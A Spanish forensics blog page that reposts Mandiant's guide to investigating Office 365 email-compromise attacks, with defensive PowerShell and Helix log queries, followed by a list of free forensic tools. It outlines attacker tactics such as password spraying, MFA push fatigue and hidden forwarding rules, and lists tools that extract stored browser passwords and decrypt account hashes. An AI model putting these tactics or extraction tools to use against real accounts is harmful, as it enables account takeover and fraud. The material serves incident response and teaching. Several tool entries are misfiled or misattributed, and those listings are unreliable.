Entrevista al Presidente de la Asociación Profesional de Peritos de Nuevas Tecnologías (PETEC)

https://www.computerworlduniversity.es/entrevistas/peritos-de-las-nuevas-tecnologias-una-profesion-de-futuro

Ago 30

Artículo: Obscured by Clouds: Insights into Office 365 Attacks and How Mandiant Managed Defense Investigates

Enlace original: https://www.fireeye.com/blog/threat-research/2020/07/insights-into-office-365-attacks-and-how-managed-defense-investigates.html

With Business Email Compromises (BECs) showing no signs of slowing down, it is becoming increasingly important for security analysts to understand Office 365 (O365) breaches and how to properly investigate them. This blog post is for those who have yet to dip their toes into the waters of an O365 BEC, providing a crash course on Microsoft’s cloud productivity suite and its assortment of logs and data sources useful to investigators. We’ll also go over common attacker tactics we’ve observed while responding to BECs and provide insight into how Mandiant Managed Defense analysts approach these investigations at our customers using PowerShell and the FireEye Helix platform.

Office 365

Office 365 is Microsoft’s cloud-based subscription service for the Microsoft Office suite. It is built from dozens of applications tightly embedded into the lives of today’s workforce, including:

  • Exchange Online, for emails
  • SharePoint, for intranet portals and document sharing
  • Teams and Skype for Business, for instant messaging
  • OneDrive, for file sharing
  • Microsoft Stream, for recorded meetings and presentations

As more and more organizations decide to adopt Microsoft’s cloud-based offering to meet their needs, unauthorized access to these O365 environments, or tenants in Microsoft’s parlance, has become increasingly lucrative to motivated attackers. The current high adoption rate of O365 means that attackers are getting plenty of hands on experience with using and abusing the platform. While many tactics have remained largely unchanged in the years since we’ve first observed them, we’ve also witnessed the evolution of techniques that are effective against even security-conscious users.

In general, the O365 compromises we’ve responded to have fallen into two categories:

  • Business Email Compromises (BECs)
  • APT or state-sponsored intrusions

Based on our experience, BECs are a common threat to any organization’s O365 tenant. The term “BEC” typically refers to a type of fraud committed by financially motivated attackers. BEC actors heavily rely on social engineering to carry out their schemes, ultimately defrauding organizations and even personnel.

One common BEC scheme involves compromising a C-suite executive’s account via phishing. Once the victim unwittingly enters their credentials into a web form masquerading as the legitimate Office 365 login portal, attackers log in and instruct others in the organization to conduct a wire transfer, perhaps under the guise of an upcoming acquisition that has yet to be publicly announced. However, we’ve also observed more effective schemes where attackers compromise those in financial positions and patiently wait until an email correspondence has begun about a due payment. Attackers seize this opportunity by sending a doctored invoice (sometimes based on a legitimate invoice that had been stolen earlier) on behalf of the compromised user to another victim responsible for making payments. These emails are typically hidden from the compromised user due to attacker-created Outlook mailbox rules. Often times, by the time the scheme is inevitably discovered and understood days or weeks later, the money is unrecoverable—highlighting the importance of contacting law enforcement immediately if you’ve fallen victim to a fraud.

The personal finances of staff aren’t off limits to attackers either. We’ve observed several cases of W-2 scams, in which attackers send a request to HR for W-2 information from the victim’s account. Once obtained, this personally identifiable information is later used to conduct tax fraud.

Conversely, APT intrusions are typically more sophisticated and are conducted by state-sponsored threat actors. Rather than for financial gain, APT actors are usually tasked to compromise O365 tenants for purposes of espionage, data theft, or destruction. Given the wealth of sensitive information housed in any given organization’s O365 tenant, APT actors may not even need to touch a single endpoint to complete their mission, sidestepping the many security controls organizations have implemented and invested in.

O365 Logs and Data Sources

In this section, we’ll touch on the multitude of logs and portals containing forensic data relevant to an O365 investigation.

Before we can begin investigating an O365 case, we’ll work with our clients to get an “Investigator” account provisioned with the roles required to obtain the forensic data we need. For the purposes of this blog post, we’ll quickly list the roles needed for an Investigator account, but during an active Managed Defense investigation, a designated Managed Defense consultant will provide further guidance on account provisioning.

At a minimum, the Investigator account should have the following roles:

Exchange Admin Roles

  • View-only audit logs
  • View-only configuration
  • View-only recipients
  • Mailbox Search
  • Message Tracking

eDiscovery Rights

  • eDiscovery Manager role

Azure Active Directory Roles

  • Global Reader

Unified Audit Log (UAL)

The Unified Audit Log records activity from various applications within the Office 365 suite, and can be considered O365’s main log source. Entries in the UAL are stored in JSON format. We recommend using the PowerShell cmdlet Search-UnifiedAuditLog to query the UAL as it allows for greater flexibility, though it can also be acquired from the Office 365 Security & Compliance Center located at protection.office.com. In order to leverage this log source (and the Admin Audit Log), ensure that the Audit Log Search feature is enabled.

The UAL has a few nuances that are important to consider. While it provides a good high-level summary of activity across various O365 applications, it won’t log comprehensive mailbox activity (for that, acquire the Mailbox Audit Log). Furthermore, the UAL has a few limitations, namely:

  • Results to a single query are limited to 5000 results
  • Only 90 days of activity are retained
  • Events may take up to 24 hours before they are searchable

Mailbox Audit Log (MAL)

The Mailbox Audit Log, part of Exchange Online, will capture additional actions performed against objects within a mailbox. As such, it’s a good idea acquire and analyze the MAL for each affected user account with the PowerShell cmdlet Search-MailboxAuditLog. Note that entries in the MAL will be retained for 90 days (by default) and timestamps will be based on the user’s local time zone. The MAL’s retention time can always be increased with the PowerShell cmdlet Set-Mailbox along with the AuditLogAgeLimit parameter.

At the time of writing this post, Microsoft has recently released information about enhanced auditing functionality that gives investigators insight into which emails were accessed by attackers. This level of logging for regular user accounts is only available for organizations with an Office 365 E5 subscription. Once Advanced Auditing is enabled, mail access activity will be logged under the MailItemsAccessed operation in both the UAL and MAL.

Administrator Audit Log

If the Audit Log Search feature is enabled, this supplemental data source logs all PowerShell administrative cmdlets (including command-line arguments) executed by administrators. If you suspect that an administrator account was compromised, don’t overlook this log! The PowerShell cmdlet Search-AdminAuditLog is used to query these logs, but note that the Audit Log Search feature must be enabled and the same 90 day retention limit will be in place.

Azure AD Logs

Azure AD logs can be accessed from the Azure portal (portal.azure.com) under the Azure Active Directory service. Azure AD Sign-in logs contain detailed information about how authentications occur and O365 application usage. Azure AD audit logs are also a valuable source of information, containing records of password resets, account creations, role modifications, OAuth grants, and more that could be indicative of suspicious activity. Note that Azure AD logs are only available for 30 days.

Cloud App Security Portal

For cases where OAuth abuse has been observed, information about cloud applications can be found in Microsoft’s Cloud App Security portal (portal.cloudappsecurity.com). Access to this portal requires an E5 license or a standalone Cloud App license. For more background on OAuth abuse, be sure to check out our blog post: Shining a Light on OAuth Abuse with PwnAuth.

Message Traces

Message traces record the emails sent and received by a user. During an investigation, run reports on any email addresses of interest. The message trace report will contain detailed mail flow information as well as subject lines, original client IP addresses, and message sizes. Message traces are useful for identifying emails sent by attackers from compromised accounts, and can also aid in identifying initial phishing emails if phishing was used for initial access. To obtain the actual emails, use the Content Search tool.

Only the past 10 days of activity is available with the Get-MessageTrace PowerShell cmdlet. Historical searches for older messages can be run with the Get-HistoricalSearch cmdlet (up to 90 days by default), but historical searches typically take hours for the report to be available. Historical reports can also be generated within the Security and Compliance Center.

eDiscovery Content Searches

The Content Search tool allows investigators to query for emails, documents, and instant message conversations stored in an Office 365 tenant. We frequently run Content Search queries to find and acquire copies of emails sent by attackers. Content searches are limited to what has been indexed by Microsoft, so recent activity may not immediately appear. Additionally, only the most recent 1000 items will be shown in the preview pane.

Anatomy of an O365 BEC

As mentioned earlier, BECs are one of the more prevalent threats to O365 tenants seen by Managed Defense today. Sometimes, Mandiant analysts respond to several BEC cases at our customers within the same week. With this frontline experience, we’ve compiled a list of commonly observed tactics and techniques to advise our readers about the types of activities one should anticipate. Please note that this is by no means a comprehensive list of O365 attacks, rather a focus on the usual routes we’ve seen BEC actors take to accomplish their objective.

Phase 1: Initial Compromise

  • Phishing: Emails with links to credential harvesting forms sent to victims, sometimes from the account of a compromised business partner.
  • Brute force: A large dictionary of passwords attempted against an account of interest.
  • Password spray: A dictionary of commonly used passwords attempted against a list of known user accounts.
  • Access to credential dump: Valid credentials used from a previous compromise of the user.
  • MFA bypasses: Use of mail clients leveraging legacy authentication protocols (e.g. IMAP/POP), which bypass MFA policies. Attackers may also spam push notifications to the victim by repeatedly attempting to log in, eventually leading to the victim mistakenly accepting the prompt.

Phase 2: Establish Foothold

  • More phishing: Additional phishing lures sent to internal/external contacts from Outlook’s global address list.
  • More credible lures: New phishing lures uploaded to the compromised user’s OneDrive or SharePoint account and shared with the victim’s coworkers.
  • SMTP forwarding: SMTP forwarding enabled in the victim’s mailbox to forward all email to an external address.
  • Forwarding mailbox rules: Mailbox rules created to forward all or certain mail to an external address.
  • Mail client usage: Outlook or third-party mail clients used by attackers. Mail will continue to sync for a short while after a password reset occurs.

Phase 3: Evasion

  • Evasive mailbox rules: Mailbox rules created to delete mail or move some or all incoming mail to uncommonly used folders in Outlook, such as “RSS Subscriptions”.
  • Manual evasion: Manual deletion of incoming and sent mail. Attackers may forego mailbox rules entirely.
  • Mail forwarding: Attackers accessing emails without logging in if a mechanism to forward mail to an external address was set up earlier.
  • Mail client usage: Outlook or third-party mail clients used by attackers. Mail can be synced locally to the attacker’s machine and accessed later.
  • VPN usage: VPN servers, sometimes with similar geolocations to their victims, used in an attempt to avoid detection and evade conditional access policies.

Phase 4: Internal Reconnaissance

  • Outlook searching: The victim’s mailbox queried by attackers for emails of interest. While not recorded in audit logs, it may be available to export if it was not deleted by attackers.
  • O365 searching: Searches conducted within SharePoint and other O365 applications for content of interest. While not recorded in audit logs, SharePoint and OneDrive file interactions are recorded in the UAL.
  • Mail client usage: Outlook or third-party mail clients used by attackers. Mail can be synced locally to the attacker’s machine and accessed later.

Phase 5: Complete Mission

  • Direct deposit update: A request sent to the HR department to update the victim’s direct deposit information, redirecting payment to the BEC actor.
  • W-2 scam: A request sent to the HR department for W-2 forms, used to harvest PII for tax fraud.
  • Wire transfer: A wire transfer requested for an unpaid invoice, upcoming M&A, charities, etc.
  • Third-party account abuse: Abuse of the compromised user’s privileged access to third-party accounts and services, such as access to a corporate rewards site.

How Managed Defense Responds to O365 BECs

In this section, we’re going to walk through how Managed Defense investigates a typical O365 BEC case.

Many of the steps in our investigation rely on querying for logs with PowerShell. To do this, first establish a remote PowerShell session to Exchange Online. The following Microsoft documentation provides guidance on two methods to do this:

Broad Scoping

We start our investigations off by running broad queries against the Unified Audit Log (UAL) for suspicious activity. We’ll review OAuth activity too, which is especially important if something more nefarious than a financially motivated BEC is suspected. Any FireEye gear available to us—such as FireEye Helix and Email Security—will be leveraged to augment the data available to us from Office 365. 

The following are a few initial scoping queries we’d typically run at the beginning of a Managed Defense engagement.

Scoping Recent Mailbox Rule Activity

Even in large tenants, pulling back all recent mailbox rule activity doesn’t typically produce an unmanageable number of results, and attacker-created rules tend to stand out from the rest of the noise.

Querying UAL for all mailbox rule activity in Helix:

class=ms_office365 action:[New-InboxRule, Set-InboxRule, Enable-InboxRule] | table [createdtime, action, username, srcipv4, srcregion, parameters, rawmsg]

Query UAL for new mail rule activity in PowerShell:

Search-UnifiedAuditLog -StartDate (Get-Date).AddDays(-90) -EndDate (Get-Date) -ResultSize 5000 -Operations “New-InboxRule”,”Set-InboxRule”,”Enable-InboxRule” | Export-CSV \path\to\file.csv –NoTypeInformation -Encoding utf8

Scoping SMTP Forwarding Activity

SMTP forwarding is sometimes overlooked because it appears under a UAL operation separate from mailbox rules. This query looks for the Set-Mailbox operation containing a parameter to forward mail over SMTP, indicative of automatic forwarding being enabled from OWA.

Querying UAL for SMTP forwarding in Helix:

class=ms_office365 action=Set-Mailbox rawmsg:ForwardingSmtpAddress | table [createdtime, action, username, srcipv4, srcregion, parameters, rawmsg]

Querying UAL for SMTP forwarding in PowerShell:

Search-UnifiedAuditLog -StartDate (Get-Date).AddDays(-90) -EndDate (Get-Date) -ResultSize 5000 -FreeText “ForwardingSmtpAddress” | Export-CSV \path\to\file.csv –NoTypeInformation -Encoding utf8

Analyze Compromised Users Logs

After we’ve finished scoping the tenant, we’ll turn our attention to the individual users believed to be involved in the compromise. We’ll acquire all relevant O365 logs for the identified compromised user(s) – this includes the user’s UAL, Mailbox Audit Log (MAL), and Admin audit log (if the user is an administrator). We’ll review these logs for anomalous account activity and assemble a list of attacker IP addresses and User-Agents strings. We’ll use this list to further scope the tenant.

O365 investigations rely heavily on anomaly detection. Many times, the BEC actor may even be active at the same time as the user. In order to accurately differentiate between legitimate user activity and attacker activity within a compromised account, it’s recommended to pull back as much data as possible to use as a reference for legitimate activity. Using the Helix query transforms groupby < [srccountry,srcregion], groupby < useragentandgroupby < srcipv4,which highlight the least common geolocations, User Agent strings, and IP addresses, can also assist in identifying anomalies in results.

Querying UAL for a user in Helix:

class=ms_office365 username=user@client.com | table [createdtime, action, username, srcipv4, srccountry, srcregion, useragent, rawmsg] | groupby < [srccountry,srcregion]

Querying UAL for a user in PowerShell:

Search-UnifiedAuditLog -StartDate mm/dd/yyyy -EndDate (Get-Date) -ResultSize 5000 -UserIds user@client.com | Export-CSV \path\to\file.csv –NoTypeInformation -Encoding utf8

Querying MAL for a user in PowerShell:

Search-MailboxAuditLog -Identity user@client.com -LogonTypes Owner,Delegate,Admin -ShowDetails -StartDate (Get-Date).AddDays(-90) -EndDate (Get-Date) | Export-CSV \path\to\file.csv –NoTypeInformation -Encoding utf8

Querying Admin Audit Log for all events within a certain date in PowerShell:

Search-AdminAuditLog -StartDate mm/dd/yyyy -EndDate mm/dd/yyyy | Export-CSV \path\to\file.csv –NoTypeInformation -Encoding utf8

Query UAL with New Leads

Now that we’ve built a list of suspicious IP addresses (or even entire CIDR ranges) and User-Agent strings, we’ll run new queries against the entire UAL to try to identify other compromised user accounts. We’ll repeat this step and the previous step for each newly identified user account.

One advantage to using FireEye Helix platform over PowerShell is that we can query entire CIDR ranges. This is helpful when we observe attackers coming from a VPN or ISP that dynamically assigns IP addresses within the same address block.

Queries for attacker User-Agent strings usually generate more noise to sift through than IP address searches. In practice, User-Agent queries are only beneficial if the attackers are using an uncommon browser or version of a browser. Due to limitations of the Search-UnifiedAuditLog cmdlet, we’ve had the most success using the FreeText parameter and searching for simple strings.

In Helix:

class=ms_office365 (srcipv4:[1.2.3.4, 2.3.4.0/24] OR useragent:Opera) | table [createdtime, action, username, srcipv4, srccountry, srcregion, useragent, rawmsg] | groupby username

Querying the UAL for IPs and user agents in PowerShell:

Search-UnifiedAuditLog -StartDate mm/dd/yyyy -EndDate (Get-Date) -ResultSize 5000 -IPAddresses 1.2.3.4, 2.3.4.5 | Export-CSV \path\to\file.csv –NoTypeInformation -Encoding utf8
Search-UnifiedAuditLog -StartDate mm/dd/yyyy -EndDate (Get-Date) -ResultSize 5000 -FreeText “Opera” | Export-CSV \path\to\file.csv –NoTypeInformation -Encoding utf8

Analyze Message Traces

We’ll use PowerShell to query message traces for the compromised users we’ve identified. If the email was sent within the past 10 days, use the Get-MessageTrace cmdlet, which immediately returns results and allows teams to query IP addresses. For older emails, use the Start-HistoricalSearch cmdlet and download the report later from the Mail Flow section of the Security & Compliance center.

Querying for the last 10 days of mail sent by the victim in PowerShell:

Get-MessageTrace -StartDate (Get-Date).AddDays(-10) -EndDate (Get-Date) -SenderAddress victim@client.com | Select-Object Received, SenderAddress, RecipientAddress, Subject, Status, FromIP, Size, MessageID | Export-CSV \path\to\file.csv –NoTypeInformation -Encoding utf8

Querying for older emails (up to 90 days) in PowerShell:

Start-HistoricalSearch -ReportTitle “Mandiant O365 investigation” -StartDate mm/dd/yyyy -EndDate mm/dd/yyyy -ReportType MessageTraceDetail -SenderAddress victim@client.com

As Message Trace results are reviewed, attention should be given to IP addresses to determine which emails were sent by attackers. If phishing was the suspected initial compromise vector, it’s a good idea to also query for incoming mail received within a few days prior to the first compromise date and look for suspicious sender addresses and/or subject lines.

Acquire Emails of Interest

With our list of suspicious emails identified from message traces, we’ll use the Content Search tool available in the Office 365 Security and Compliance Center acquire the email body and learn what domains were used in phishing lures (if phishing was present). Content Searches are performed by using a straightforward GUI, and the results can either be previewed in the browser, downloaded individually as EML files, or downloaded in bulk as PST files.

Final Scoping

At this point of our investigation, the BEC should be sufficiently scoped within the tenant. To ensure any follow-on activity hasn’t occurred, we’ll take all of the attack indicators and perform our final queries across the UAL.

With that said, there are still edge cases in which attacker activity wouldn’t appear in O365 logs. For example, perhaps an additional user has submitted their credentials to a phishing page, but the attackers haven’t used them to log in yet. To ensure we don’t miss this activity, we’ll perform additional scoping across available network logs, specifically for IP addresses and domains related to the attacker’s phishing infrastructure. We’ll also leverage other FireEye products, such as the Endpoint Security platform, to search for phishing domains present on a host’s web browser history.

Conclusion

Unauthorized access to O365 tenant doesn’t just pose a threat to an organization, but also to its staff and business partners. Organizations without enhanced security controls in O365 are at the greatest risk of experiencing a BEC. However, as multi factor-authentication becomes more and more commonplace, we’ve witnessed an increase of MFA bypass attempts performed by increasingly proficient attackers.

It’s important to remember that social engineering plays a primary role throughout a BEC. Ensure that users are trained on how to identify credential harvesting forms, a common compromise vector. When in the midst of a BEC compromise, teams may want to promptly alert personnel in HR and finance-related roles to exercise extra caution when processing requests related to banking or wire transfers while the investigation is in progress.

The examples covered in this blog post are just a sample of what Managed Defense performs while investigating an Office 365 compromise. To take a proactive approach at preventing BECs, make sure the following best practices are implemented in a O365 tenant. Additionally, FireEye Email Security offers protections against phishing and the Helix platform’s O365 ruleset can alert on anomalous activity as soon as it happens.

Recommended Best Practices

  • Ensure mailbox audit logging is enabled on all accounts
  • Disable Legacy Authentication protocols
  • Enable multi-factor authentication (MFA)
  • Enforce strong passwords and a password expiration policy
  • Forward O365 audit logs to a centralized logging platform for extended retention
  • Enforce an account lockout policy in Azure/on-premise Active Directory
  • Restrict mail forwarding to external domains

Jul 28

Utilidades: Free Forensics Software – The Ultimate List.

Enlace: https://www.secureforensics.com/resources/free-software

Free Forensics Software – The Ultimate List

Sometimes forensic examiners need a list of free forensics software to strengthen their investigation. Fortunately, we have developed and provided an extensive list of free forensics software and tools.

Back to Top
The following free forensic software list was developed over the years, and with partnerships with various companies. Feel free to browse the list and download any of the free forensic tools below.

Browse free computer forensics software and utilities by category below:


Disk Tools & Data Capture

Below is a list of commonly used free forensic disk tools and data capture tools. These allow you to image a media and to capture the data for preservation.

SOFTWAREDEVELOPED BYDESCRIPTION
Arsenal Image MounterArsenal Consulting, Inc.Mounts disk images as complete disks in Windows, giving access to Volume Shadow Copies, etc.
DumpItMoonSolsGenerates physical memory dump of Windows machines, 32 bits 64 bit. Can run from a USB flash drive.
EnCase Forensic ImagerGuidance SoftwareCreate EnCase evidence files and EnCase logical evidence files
Encrypted Disk DetectorMagnet ForensicsChecks local physical drives on a system for TrueCrypt, PGP, or Bitlocker encrypted volumes.
EWF MetaEditor4DiscoveryEdit EWF (E01) meta data, remove passwords (EnCase v6 and earlier).)
FAT32 FormatRidgecropEnables large capacity disks to be formatted as FAT32.
Forensics Acquisition of WebsitesWeb Content Protection AssociationBrowser designed to forensically capture web pages.
FTK ImagerAccessDataImaging tool, disk viewer and image mounter.
Guymagervogu00Multi-threaded GUI Imager running under Linux.
Live RAM CapturerBelkasoftExtracts RAM dump including that protected by an anti-debugging or anti-dumping system. with 32 and 64 bit builds.
NetworkMinerHjelmvikNetwork analysis tool. Detects OS, hostname and open ports of network hosts through packet sniffing/PCAP parsing.
NmapNmapUtility for network discovery and security auditing.
Magnet RAM CaptureMagnet ForensicsCaptures physical memory of a suspect’s computer. Windows XP to WIndows 10, and 2003, 2008, 2012. 32 & 64 bit.
OSFClonePassmark SoftwareBoot utility for CD/DVD or USB flash drives to create dd or AFF images and clones.
OSFMountPassmark SoftwareMounts a wide range of disk images. Also allows creation of RAM disks.
WiresharkWiresharkNetwork protocol capture and analysis
Disk2vhdMicrosoftCreates Virtual Hard Disks versions of physical disks for use in Microsoft Virtual PC or Microsoft Hyper-V VMs

E-Mail Analysis

Below are free tools for forensic email analysis. These tools can help with the different aspects of forensic email analysis including identifying and organizing the path between sender and recipient, analyzing attachments, categorizing and mapping out emails, and so forth.

SOFTWAREDEVELOPED BYDESCRIPTION
EDB ViewerLepide SoftwareOpen and view (not export) Outlook EDB files without an Exchange server.
Mail ViewerMiTeCViewer for Outlook Express, Windows Mail / Windows Live Mail, Mozilla Thunderbird message databases and single EML files.
Email Header Analysis (RCCF)RCCFTool for tracking email sender’s identity, analyzes header and gives details like IP address, mail service, provider, etc.
MBOX ViewerSysToolsView MBOX emails and attachments.
OST ViewerLepide SoftwareOpen and view (not export) Outlook PST files without connecting to an Exchange server.
PST ViewerLepide SoftwareOpen and view (not export) Outlook PST files without needing Outlook.

File and Data Analysis

Windows and other operating systems store user data in files with unique format and encoding. Usually specific to one type, these free tools are used to decode those files.

SOFTWAREDEVELOPED BYDESCRIPTION
Advanced PrefetchAnayserAllan HayReads Windows XP, Vista and Windows 7 prefetch files.
AnalyzeMFTDavid KovarParses the MFT from an NTFS file system allowing results to be analysed with other tools.
bstringsEric ZimmermanFind strings in binary data, including regular expression searching.
CapAnalysisrEvolkaPCAP viewer.
Crowd ResponseCrowdStikeWindows console application to aid gathering of system information for incident response and security engagements.
Crowd InspectCrowdStrikeDetails network processes, listing binaries associated with each process. Queries VirusTotal, other malware repositories & reputation services to produce “at-a-glance” state of the system.
DCodeDigital DetectiveConverts various data types to date/time values.
DefraserVariousDetects full and partial multimedia files in unallocated space.
eCryptfs ParserTed TechnologyRecursively parses headers of every eCryptfs file in selected directory. Outputs encryption algorithm used, original file size, signature used, etc.
Encryption AnalyzerPasswareScans a computer for password-protected & encrypted files, reports encryption complexity and decryption options for each file.
ExifToolPhil HarveyRead, write and edit Exif data in a large number of file types.
File IdentifierToolsley.comDrag and drop web-browser JavaScript tool for identification of over 2000 file types.
Forensic Image ViewerSanderson ForensicsView various picture formats, image enhancer, extraction of embedded Exif, GPS data. Can be downloaded after registering on the forum.
GhiroAlessandro TanasiIn-depth analysis of image (picture) files.
HighlighterMandiantExamine log files using text, graphic or histogram views.
Link Parser4DiscoveryRecursively parses folders extracting 30+ attributes from Windows .lnk (shortcut) files.
LiveContactsViewNirsoftView and export Windows Live Messenger contact details.
PECmdEric ZimmermanPrefetch Explorer.
RSA Netwitness InvestigatorEMCNetwork packet capture and analysis.
MemoryzeMandiantAcquire and/or analyse RAM images, including the page file on live systems.
MetaExtractor4DiscoveryRecursively parses folders to extract meta data from MS Office, OpenOffice and PDF files.
MFTviewSanderson ForensicsDisplays and decodes contents of an extracted MFT file. Can be downloaded after registering for forum.
PictureBoxMike’s Forensic ToolsLists EXIF, and where available, GPS data for all photographs present in a directory. Export data to .xls or Google Earth KML format.
PsToolsMicrosoftSuite of command-line Windows utilities.
Shadow ExplorerShadow ExplorerBrowse and extract files from shadow copies.
SQLite ManagerMrinal Kant, Tarakant TripathyFirefox add-on enabling viewing of any SQLite database.
StringsMicrosoftCommand-line tool for text searches.
Structured Storage ViewerMiTecView and manage MS OLE Structured Storage based files.
Windows File AnalyzerMiTecAnalyse thumbs.db, Prefetch, Windows File MiTeC INFO2 and .lnk files.
XplicoGianluca Costa & Andrea De FranceschiNetwork forensics analysis tool.

Mac OS Tools

Mac OS X and it’s many other versions store user data in files with unique format and encoding. Usually specific to one type, these free tools are used to decode those files.

SOFTWAREDEVELOPED BYDESCRIPTION
AuditrTwocanoesAudit Preference Pane and Log Reader for OS X.
Disk ArbitratorAaron BurghardtBlocks the mounting of file systems, complimenting a write blocker in disabling disk arbitration.
Epoch ConverterBlackbag TechnologiesConverts epoch times to local time and UTC.
FTK Imager CLI for Mac OSAccessDataCommand line Mac OS version of AccessData’s FTK Imager.
IORegInfoBlackbag TechnologiesLists items connected to the computer (e.g., SATA, USB and FireWire Drives, software RAID sets). Can locate partition information, including sizes, types, and the bus to which the device is connected.
mac_aptYogesh Khatri, Champlain CollegeMac OS triage tool, works usable against E01, DD, DMG and mounted images
PMAP InfoBlackbag TechnologiesDisplays the physical partitioning of the specified device. Can be used to map out all the drive information, accounting for all used sectors.
VolafoxKyeongsik LeeMemory forensic toolkit for Mac OS X

Mobile Devices

Because they safeguard user data differently, mobile phones require different tools for acquisition or analysis. The free tools listed here are designed to conduct these operations for a specific mobile phone model or OS.

SOFTWAREDEVELOPED BYDESCRIPTION
iPBA2Mario PiccinelliExplore iOS backups.
iPhone AnalyzerLeo Crawford, Mat ProudExplore the internal file structure of Pad, iPod and iPhones.
ivMetaRobin WoodExtracts phone model and software version and created date and GPS data from iPhone videos.
RubusCCL ForensicsDeconstructs Blackberry .ipd backup files.
SAFTSignalSEC CorpObtain SMS Messages, call logs and contacts from Android devices.

Data Analysis Suites

Data Analysis Suites combine the functions of individual applications into an integrated interface or applications. Data Analysis Suites allow analysts to sort through data quickly and efficiently while maintaining case data in one single location.

SOFTWAREDEVELOPED BYDESCRIPTION
AutopsyBrian CarrierGraphical interface to the command line digital investigation analysis tools in The Sleuth Kit
BacktrackBacktrackPenetration testing and security audit with forensic boot capability. Now is a part of Kali Linux.
CaineNanni BassettiLinux based live CD, featuring a number of analysis tools.
DeftDr. Stefano Fratepietro and othersLinux based live CD, featuring a number of analysis tools.
Digital Forensics FrameworkArxSysAnalyses volumes, file systems, user and applications data, extracting metadata, deleted and hidden items.
Forensic ScannerHarlan CarveyAutomates ‘repetitive tasks of data collection’.
Kali LinuxOffensive SecurityComprehensive penetration testing platform
PaladinSumuriUbuntu based live boot CD for imaging and analysis.
SIFTSANSAnalyses volumes, file systems, user and applications data, extracting metadata, deleted and hidden items.
The Sleuth KitBrian CarrierCollection of UNIX-based command line file and volume system forensic analysis tools.
Volatility FrameworkVolatile SystemsCollection of tools for the extraction of artefacts from RAM.

File Viewers

Instead of launching individual applications for each file type that requires review, sometimes it’s possible to use one application to view many types of files. “One size fits all” file viewers allow an examiner to efficiently review user-generated files or Web artifacts.

SOFTWAREDEVELOPED BYDESCRIPTION
BKF ViewerSysToolsView (not save or export from) contents of BKF backup files.
DXL ViewerSysToolsView (not save or export) Loutus Notes DXL file emails and attachments.
E01 ViewerSysToolsView (not save or export from) E01 files & view messages within EDB, PST & OST files.
MDF ViewerSysToolsView (not save or export) MS SQL MDF files.
MSG ViewerSysToolsView (not save or export) MSG file emails and attachments.
OLM ViewerSysToolsView (not save or export) OLM file emails and attachments.
Microsoft PowerPoint 2007ViewerMicrosoftView PowerPoint presentations.
Microsoft Visio 2010 ViewerMicrosoftView Visio diagrams.
VLCVideoLANView most multimedia files and DVD, Audio CD, VCD, etc.

Internet Analysis

Internet Analysis applications are designed to decode and tabulate the files that keep track of Web browsing, email, or chat. Typically created by a Web browser or dedicated application, the user activity stored within usually requires decoding specific to it. Internet Analysis tools decode the data and process it into a review-able format.

SOFTWAREDEVELOPED BYDESCRIPTION
Browser History CapturerFoxton SoftwareCaptures history from Firefox, Chrome, Internet Explorer and Edge web browsers running on Windows computers.
Browser History ViewerFoxton SoftwareExtract, view and analyse internet history from Firefox, Chrome, Internet Explorer and Edge web browsers.
Chrome Session ParserCCL ForensicsPython module for performing off-line parsing of Chrome session files (“Current Session”, “Last Session”, “Current Tabs”, “Last Tabs”).
ChromeCacheViewNirsoftReads the cache folder of Google Chrome Web browser, and displays the list of all files currently stored in the cache.
Cookie CutterrMike’s Forensic ToolsExtracts embedded data held within Google Analytics cookies. Shows search terms used as well as dates of and the number of visits.
DumpzillarBusindreRuns in Python 3.x, extracting forensic information from Firefox, Iceweasel and Seamonkey browsers. See manual for more information.
Facebook Profile SaverBelkasoftCaptures information publicly available in Facebook profiles.
IECookiesViewNirsoftExtracts various details of Internet Explorer cookies.
IEPassViewNirsoftExtract stored passwords from Internet Explorer versions 4 to 8.
MozillaCacheViewNirsoftReads the cache folder of Firefox/Mozilla/Netscape Web browsers.
MozillaCookieViewNirsoftParses the cookie folder of Firefox/Mozilla/Netscape Web browsers.
MozillaHistoryViewNirsoftReads the history.dat of Firefox/Mozilla/Netscape Web browsers, and displays the list of all visited Web page.
MyLastSearchNirsoftExtracts search queries made with popular search engines (Google, Yahoo and MSN) and social networking sites (Twitter, Facebook, MySpace).
PasswordFoxrNirsoftExtracts the user names and passwords stored by Mozilla Firefox Web browser.
OperaCacheViewNirsoftReads the cache folder of Opera Web browser, and displays the list of all files currently
stored in the cache.
OperaPassViewNirsoftDecrypts the content of the Opera Web browser password file, wand.dat
Web HistorianMandiantReviews list of URLs stored in the history files of the most commonly used browsers.
Web Page SaverMagnet ForensicsCaptures how web pages look at a specific point in time. Requires a form to fill out prior to download.

Application Analysis

These tools allow an analyst to decode an application and analyze its intended function or decode its stored user data and preferences.

SOFTWAREDEVELOPED BYDESCRIPTION
AppCompatCache ParserEric ZimmermanDumps list of shimcache entries showing which executables were run and their modification dates.
ForensicUserInfoWoanwareExtracts user information from the SAM, SOFTWARE and SYSTEM hives files and decrypts the LM/NT hashes from the SAM file.
Process MonitorMicrosoftExamine Windows processes and registry threads in real time.
RECmdEric ZimmermanCommand line access to offline Registry hives. Supports simple & regular expression searches as well as searching by last write timestamp.
Registry DecoderUS National Institute of Justice, Digital Forensics SolutionsFor the acquisition, analysis, and reporting of registry contents.
Registry ExplorerEric ZimmermanOffline Registry viewer. Provides deleted artefact recovery, value slack support, and robust searching.
RegRipperHarlan CarveyRegistry data extraction and correlation tool.
RegshotRegshotTakes snapshots of the registry allowing comparisons e.g., show registry changes after installing software.
ShellBagsExplorerEric ZimmermanPresents visual representation of what a user’s directory structure looked like. Additionally exposes various timestamps (e.g., first explored, last explored for a given folder.
USB DeviceWoanwareDetails previously attached USB devices on exported registry hives.
USB Historian4DiscoveryDisplays 20+ attributes relating to USB device use on Windows systems.
USBDeviewNirsoftDetails previously attached USB devices.
User Assist Analysis4DiscoveryExtracts SID, User Names, Indexes, Application Names, Run Counts, Session, and Last Run Time Attributes from UserAssist keys.
PasswordFoxNirsoftExtracts the user names and passwords stored by Mozilla Firefox Web browser.
UserAssistDidier StevensDisplays list of programs run, with run count and last run date and time.
Arsenal Image MounterMiTecExtracts configuration settings and other information from the Registry.

Registry Analysis

Specific to Windows, the registry is the central repository of Windows configuration, application settings, and user preferences. Registry analysis tools decode the proprietary hives and assist an analyst with reviewing keys pertinent to their analysis.

SOFTWAREDEVELOPED BYDESCRIPTION
Dropbox DecryptorMagnet ForensicsDecrypts the Dropbox filecache.dbx file which stores information about files that have been synced to the cloud using Dropbox. Tool can be downloaded after filling out a form.
